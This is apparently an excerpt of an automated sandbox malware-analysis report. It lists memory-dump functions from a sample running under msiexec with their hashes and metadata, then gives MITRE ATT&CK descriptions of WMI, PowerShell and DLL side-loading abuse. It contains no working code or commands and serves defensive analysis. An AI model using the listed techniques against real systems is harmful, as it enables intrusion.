Instruction ID: f08a54a3aad9d365e221099037d27f3c7f104b5b5eca971c6da051cd10ed2760
Opcode Fuzzy Hash: 2e935bdaa597abacb3435e20164ae1766cf66614e77d7a1775e4d7d2abba6901
Instruction Fuzzy Hash: 882134353066149FC7258B79C49892FB7A6EF8A3507198069E807CB3A4CF32CC02CB95

Function 030328F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3688c966e39a807dc27c17a9af6fe8c0a2cdec9e460299f6151fe5965812e1d3
Instruction ID: b0f93332137852b0b1c25045049c8d62f9dfa6d2c18e6a158a86bc9e3c2ebc15
Opcode Fuzzy Hash: 3688c966e39a807dc27c17a9af6fe8c0a2cdec9e460299f6151fe5965812e1d3
Instruction Fuzzy Hash: 2E21C435A002159FCB14CB28C450AAE3BFDEB9E360B65C95AD8099B254DA35EE42CBD0

Function 0300D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513177840.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_300d000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c968a130172955835ff6cfa03b2ac927bcc3881409567e71d489b53a57f3aa
Instruction ID: b11dbdf363dfb8512aa467d75e5e86193c63f07fcc19dc345d5d2ec7602571c5
Opcode Fuzzy Hash: 54c968a130172955835ff6cfa03b2ac927bcc3881409567e71d489b53a57f3aa
Instruction Fuzzy Hash: 03210375605304AFEB14CF64DAC4B16BBA5EB84314F24C9A9E84D0B282C736D447CA72

Function 030329EC Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b8611493bb97fbbb0de28d3870daf45e3da03286eeebc76de6dce03615daaa
Instruction ID: f40c24e968366a4492ab15f49b38ec6e7c179670643865ff3186b29ab7f306a6
Opcode Fuzzy Hash: 63b8611493bb97fbbb0de28d3870daf45e3da03286eeebc76de6dce03615daaa
Instruction Fuzzy Hash: 3A212432E0839A8FCF05DBB898105DEFBB5FF9A310B248657D165B7191E630690AC791

Function 03035649 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3007c119b046168395de02d3d59a8debdc29dc7cdc594352aafa7b5774646c
Instruction ID: a52b491343fdbd8160f62a57c515bab024f0d38e6bc50770f5140840a4bacb6a
Opcode Fuzzy Hash: 7d3007c119b046168395de02d3d59a8debdc29dc7cdc594352aafa7b5774646c
Instruction Fuzzy Hash: B6210431706148CFCB44DF78C858AAF7BA6EB46310F144068F8068B360C7348D25CBA0

Function 03036300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05db2ed8a386325dba9f3dc3d3a32937156627074c7646c8bdc8f132f37a6967
Instruction ID: d0471ff6ea8f771f8385a186d999700666bbb167f4b9d130cf1179cfa97e8b41
Opcode Fuzzy Hash: 05db2ed8a386325dba9f3dc3d3a32937156627074c7646c8bdc8f132f37a6967
Instruction Fuzzy Hash: 9511A535306A15AFC7159B3AC89892FB7AAFF867513194468E807CB760CF32DC02CB95

Function 030327F0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a51964d8e8ef56723d7a4408dd963e0c4e71646a9b4c3b4aaeb9479d0e760ec9
Instruction ID: 167117b2dd245ea62d8470d6c3e85164ec8fd68e15dd9ea14daf24c02ff664c8
Opcode Fuzzy Hash: a51964d8e8ef56723d7a4408dd963e0c4e71646a9b4c3b4aaeb9479d0e760ec9
Instruction Fuzzy Hash: E521F274D056198FCB05EFB9C9885EEBFF4FF0A300F40456AD845B2220EB341A85DBA1

Function 0303F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a52b825e7a38ce174799c83f3ab235ce0fe74e675845f97f4e3e2826a234392
Instruction ID: 1e8a0e9413f7dd102597054b019af79d738ebf5d7ee4ca2d22e79fc9b4343d50
Opcode Fuzzy Hash: 5a52b825e7a38ce174799c83f3ab235ce0fe74e675845f97f4e3e2826a234392
Instruction Fuzzy Hash: 6B114C74D012499FDB44EFA9C550B9EBBF2FF44304F14C5A9C1189B368EB346A0A8F81

Function 0300D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513177840.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_300d000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6722426bdc43f57023bb4cf81ed15ec6deec28a26e0098cf395c5a7b663100
Instruction ID: 146edc23c2705280147e78b8dd6fc30b0d2f73bed42b307ccfd0028b8cebc277
Opcode Fuzzy Hash: 7d6722426bdc43f57023bb4cf81ed15ec6deec28a26e0098cf395c5a7b663100
Instruction Fuzzy Hash: 5111DD79504284DFDB15CF54DAC4B15FBA2FB84324F28C6ADD8494B692C33AD44ACF62

Function 03035E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62b13098a0c5e4b033721b496ec1fa77fa9d2f8ba8c2e07de72eeefafba7312a
Instruction ID: 9482492f07ac5f342a2a3dbb0252337643d3987c1b1fc47c50098207ff551264
Opcode Fuzzy Hash: 62b13098a0c5e4b033721b496ec1fa77fa9d2f8ba8c2e07de72eeefafba7312a
Instruction Fuzzy Hash: 25016D327052586FCB55CFA88C14AEF3FFBEBCA250F198066F401C7290CA758C158795

Function 0303AF5B Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93dd9d0453225138be53bde60223d709d2ee6b45f65bb9bb3c6efc2086e571ae
Instruction ID: 8e1b6c3a56211f2b0d3f919ae0432cc5c83d80d2c526dd50836dcc2e0fca81af
Opcode Fuzzy Hash: 93dd9d0453225138be53bde60223d709d2ee6b45f65bb9bb3c6efc2086e571ae
Instruction Fuzzy Hash: 83F03036649144EFCB01DF94DC54ECDBFB2FF8D211F184496EA11AB2A1C2319814CB61

Function 030328B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29262079bb5a89d626766820dc6c04d3c66faa28febae2277044a18c4f2d62c1
Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
Opcode Fuzzy Hash: 29262079bb5a89d626766820dc6c04d3c66faa28febae2277044a18c4f2d62c1
Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1

Function 030328AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801f8c31b3c24a613793609d05f21aa38b1a41489649e3510bbd86a2800d688a
Instruction ID: 7a2ed4f42e64d80e97c3a8c86a7b084cc14de39c0cf17b1ae3088047e3bb1ecb
Opcode Fuzzy Hash: 801f8c31b3c24a613793609d05f21aa38b1a41489649e3510bbd86a2800d688a
Instruction Fuzzy Hash: F3D02B35D2032686CB00EBB4DC040FEB774AEC0322B918313C03433154EB31125DC7A0

Function 0303AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2395aafe073055f8a1c53984e993fad6c33e6024aeff434869c234a6d2f0d940
Instruction ID: 8221ab71c661171ae8a253a214355c78fa9a52c3f8725bb9c24e4c0169d2709a
Opcode Fuzzy Hash: 2395aafe073055f8a1c53984e993fad6c33e6024aeff434869c234a6d2f0d940
Instruction Fuzzy Hash: 1AD0673BB000089FCB049F98EC44DDDF776FB98221B448126E916A3260C6319965DB64

Function 03036745 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8f94f5d3afa8638d9f34e522c3b5fd9e7c7f677c524b09b2ed55547ab87c66
Instruction ID: b149859f8ca8b6a562a1778704313d39f05fce3ef7a3d72ef450433c03f58c14
Opcode Fuzzy Hash: ff8f94f5d3afa8638d9f34e522c3b5fd9e7c7f677c524b09b2ed55547ab87c66
Instruction Fuzzy Hash: 31D022398443614FD505EB74CC4886A3723A7D01017008710900908A6DCE3A692B8BA0

Function 03036748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25657ad7869ad0c91fc2ae7661d760503e704fb11ab4397f63bea428460b6f5
Instruction ID: 479e303a2d8f534054a768134b14c43fb768da861534683c6ce8a6678d1a74f5
Opcode Fuzzy Hash: e25657ad7869ad0c91fc2ae7661d760503e704fb11ab4397f63bea428460b6f5
Instruction Fuzzy Hash: FDC022384003284FC144F734CC04C05332BA7C0100B408610900D09A2CDE78392B4BD0

Non-executed Functions

Function 03037118 Relevance: 5.3, Strings: 4, Instructions: 341COMMON

Download Yara Rule

Strings

,q, xrefs: 0303728A
,q, xrefs: 03037298
(oq, xrefs: 03037220
(oq, xrefs: 03037212

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: a419ce6d2465208e4fd3021f8e76deee87670937fb1302c445822356b11d7043
Instruction ID: 30b201be49dd2396efb4a8d8cf76879fff7985cfff7634dbab3f51f2834fa098
Opcode Fuzzy Hash: a419ce6d2465208e4fd3021f8e76deee87670937fb1302c445822356b11d7043
Instruction Fuzzy Hash: 6EE13DB1A02119DFCB54CFA9C884AADBBFAFF8A700F598455E845AB361D730EC41CB51

Function 23260B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d79ca22d48f240d85420082ff9a60e453449da2d92df15352a44b1c8c84dd908
Instruction ID: 076c8befa277ad9c16b1b0c2e6f91568e013ae25e51f1902986eff93478319ac
Opcode Fuzzy Hash: d79ca22d48f240d85420082ff9a60e453449da2d92df15352a44b1c8c84dd908
Instruction Fuzzy Hash: 8F729A74E052698FDB64DF69C980BD9BBB2BF49300F1481EAD409A7255DB34AEC2CF50

Function 23260040 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35487e7ea7a8726d4b89c19fd3d39e35ea1691047c8e48fbfa0524da5037ecf7
Instruction ID: b1669084398d639c874bac5fc02ff1aa97bf02e17cfb379a54935d6750b35c71
Opcode Fuzzy Hash: 35487e7ea7a8726d4b89c19fd3d39e35ea1691047c8e48fbfa0524da5037ecf7
Instruction Fuzzy Hash: 28528974E01228CFDB64DF69C884B9DBBB2BF89301F1481EAD409AB254DB359E85DF50

Function 2326EB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76959002233a9ca44f847d9cbe7dbaa4a89cc5bcc0a082d64f7fd60ee373fb9
Instruction ID: 5081cb9a9c5801c66c505fe80021871e9d3bbdf1e43f62517dc35b6a1a60230b
Opcode Fuzzy Hash: d76959002233a9ca44f847d9cbe7dbaa4a89cc5bcc0a082d64f7fd60ee373fb9
Instruction Fuzzy Hash: 54C18F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB35AE85CF50

Function 2326EF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69c900f50a4fcd490b2689e467c3e691be3fdc048e3addf2b2b17bc356d81f0
Instruction ID: 61d22ae26a9b8ab5b6bd960746f23549f8c8268982eb2c8c561842ec8c06f68c
Opcode Fuzzy Hash: c69c900f50a4fcd490b2689e467c3e691be3fdc048e3addf2b2b17bc356d81f0
Instruction Fuzzy Hash: A7C18D74E01318CFDB54DFA5C994B9DBBB2AF89300F2081AAD409AB355DB35AE85CF50

Function 2326F3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4beb9943ccde8b3781ac772813d27373e86ac2838f49128270292156d64b920
Instruction ID: b6b7905282bdf847562bd8a364ce5acc318a7e5e5d05d98391609cab6a597491
Opcode Fuzzy Hash: b4beb9943ccde8b3781ac772813d27373e86ac2838f49128270292156d64b920
Instruction Fuzzy Hash: 93C18F74E01318CFDB54DFA5C994B9DBBB2AF89300F2081AAD409AB355DB35AE85CF50

Function 2326DE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bd0e3cbf805d3a1da6aca0335ee2dee14bc491f2072ea95b55dad1bbf655ca
Instruction ID: 25d0b15b8dbed1e6b1b3965f01c4a11af21c1d8972b50f17b811acfaacc00970
Opcode Fuzzy Hash: c9bd0e3cbf805d3a1da6aca0335ee2dee14bc491f2072ea95b55dad1bbf655ca
Instruction Fuzzy Hash: 6FC18E74E01218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB35AE85CF50

Function 2326E258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a4e22592c71e1ec2c1695612172d74185c19225fa034da564184e16f442fd9f
Instruction ID: 6e2565dfc7d2a716628021a999bcacd091bd3e36242ae0b2aa6cc8dc1dadfd5b
Opcode Fuzzy Hash: 0a4e22592c71e1ec2c1695612172d74185c19225fa034da564184e16f442fd9f
Instruction Fuzzy Hash: 6EC19F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB35AE85CF50

Function 2326E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60cc8fc12eba778a11ea16c33c361991e162cdafebf963ff09128b0972d7f520
Instruction ID: a348462cd3eab9d8c6d1074ccaef572c734965dcef13ac5a45d96233232dffd2
Opcode Fuzzy Hash: 60cc8fc12eba778a11ea16c33c361991e162cdafebf963ff09128b0972d7f520
Instruction Fuzzy Hash: 5DC18E74E01218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB35AE85CF50

Function 23262968 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171e9f0434a241a633dd1ecaf6ea989d093ac80ba20c673813a8117077722d58
Instruction ID: e5d2eb8f9b10f7962baff72c933fd78edff633f35f1bc968a0b135ccfd4b4e29
Opcode Fuzzy Hash: 171e9f0434a241a633dd1ecaf6ea989d093ac80ba20c673813a8117077722d58
Instruction Fuzzy Hash: FAC19E78E01218CFDB14DFA5C994B9DBBB2BF89305F2081A9D809AB355DB359A81CF50

Function 2326D550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7875e4e71966502cc58f88fc41b05e4dfb691b215de0310de609045604416ce
Instruction ID: 5b140527adbbdc7b0fab35d2fce9556c7c0840d10b828158d1805d5229696f52
Opcode Fuzzy Hash: e7875e4e71966502cc58f88fc41b05e4dfb691b215de0310de609045604416ce
Instruction Fuzzy Hash: 6CC18E74E01218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB35AE85CF50

Function 2326D9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a4bd00159047da8d0c309a8ad91d4f589fc3c6a1bed11ba5c5ec1b6f7d5828
Instruction ID: 4b9e0d5c6230c1d61b3eb5a69a843156c7214a7bee6da87a26c72a3e573e8544
Opcode Fuzzy Hash: e4a4bd00159047da8d0c309a8ad91d4f589fc3c6a1bed11ba5c5ec1b6f7d5828
Instruction Fuzzy Hash: 81C19D74E01218CFDB54DFA5C994B9DBBB2AF89300F2081AAD409AB355DB35AE85CF50

Function 2326F810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db2fd1edb63a7cc04f0ef0f5ffc5cb236b264f6343d9a0ee6e7f9587622184d1
Instruction ID: e2802c027ba1dea21efa28fe9a033d39e6f37db8bd55fd50b6f36fc32edc6bc1
Opcode Fuzzy Hash: db2fd1edb63a7cc04f0ef0f5ffc5cb236b264f6343d9a0ee6e7f9587622184d1
Instruction Fuzzy Hash: 08C19F74E01318CFDB14DFA5C994B9DBBB2AF89300F2081AAD409AB355DB35AE85CF50

Function 2326D0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 064237e734a07b73aa9ea086ca16cc0ba30594822125e6e0e1d2d46d4d6d743d
Instruction ID: 0e80daa069dab574458ab73fcdbacd3def005f34094988975dbe76fcc9814c76
Opcode Fuzzy Hash: 064237e734a07b73aa9ea086ca16cc0ba30594822125e6e0e1d2d46d4d6d743d
Instruction Fuzzy Hash: E8C19F74E01218CFDB54DFA5C994B9DBBB2EF89300F2081AAD409AB355DB35AE85CF50

Function 23262DBB Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0769cc67c6c155e203147a321aaff1af89df6075771fec7fc185b31143fa7de0
Instruction ID: 0d3019f4d3efb36807adcd22ffd9aa7b0504c46f1f38aececd0931735908840f
Opcode Fuzzy Hash: 0769cc67c6c155e203147a321aaff1af89df6075771fec7fc185b31143fa7de0
Instruction Fuzzy Hash: CEA10370D002188FEB10DFA9C984BDDBBB1FF89300F2482A9D509AB3A5DB759985CF55

Function 23262DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58db6626944f727e01a60bc93864b723e1fbcc99ee8a27d7d4c478918d17863
Instruction ID: 93d12f312b12ff6f77c61ded5a953a1277f59a749a05f92e9421095886e0933d
Opcode Fuzzy Hash: d58db6626944f727e01a60bc93864b723e1fbcc99ee8a27d7d4c478918d17863
Instruction Fuzzy Hash: EFA10370D00218CFEB10DFA9C944B9DBBB1FF88314F2482A9D508AB3A5DB759985CF55

Function 2326310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4bc9df993ed8ac5d67412c51a333fdd57d14b68e7d8c50bb23180dff3e68b4
Instruction ID: 5ef12bb30f0a742f5f01b9b9cf87c1c6e14a5305895f20f14c41ddd026aaa770
Opcode Fuzzy Hash: 4a4bc9df993ed8ac5d67412c51a333fdd57d14b68e7d8c50bb23180dff3e68b4
Instruction Fuzzy Hash: 6591F374D00218CFEB10DFA8C948B9CBBB1FF49310F208299D519AB2A5DB7599C5CF55

Function 23260673 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4530d4f1be587b8777941b64ce3863e077c6b803f745591c544dfe8f36907050
Instruction ID: aab67a89be8d0b1b1deac104a78993bb8592036b5a40d5c576e8382981430637
Opcode Fuzzy Hash: 4530d4f1be587b8777941b64ce3863e077c6b803f745591c544dfe8f36907050
Instruction Fuzzy Hash: F2A1AD74A05228CFDB64DF24C894B9ABBB2BF8A301F1085EAD409A7354DB359EC1CF51

Function 23260853 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2534873845.0000000023260000.00000040.00000800.00020000.00000000.sdmp, Offset: 23260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_23260000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee91193e3372103ce1767e6e684793f231da0f4aac95ab946e2427870917235
Instruction ID: 3f479423d15e79e06d6a7b056f3f1d5c601fc66871318b2099a47c724e3e86c4
Opcode Fuzzy Hash: 4ee91193e3372103ce1767e6e684793f231da0f4aac95ab946e2427870917235
Instruction Fuzzy Hash: 3D519274A01228CFCB69DF24C854B9AB7B2BF4A341F5095EAD409A7354CB35AE81CF50

Function 03036920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 0303692C
\;q, xrefs: 03036936
\;q, xrefs: 0303695E
\;q, xrefs: 03036952

Memory Dump Source

Source File: 0000000B.00000002.2513626292.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3030000_msiexec.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: ec6cb30027de1acbfe3cc3cb7bd6f3b3b15301ca65acde66cdeffb6ff1c71411
Instruction ID: f202dff5a9d3ec7c98183cc5a15767f3659a60dd1b0278c843f7286dadac7f6e
Opcode Fuzzy Hash: ec6cb30027de1acbfe3cc3cb7bd6f3b3b15301ca65acde66cdeffb6ff1c71411
Instruction Fuzzy Hash: 5E018431701119AFC765CA2DC480A29F7EEAF8A76472945ABE806CB370DE72EC418750

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
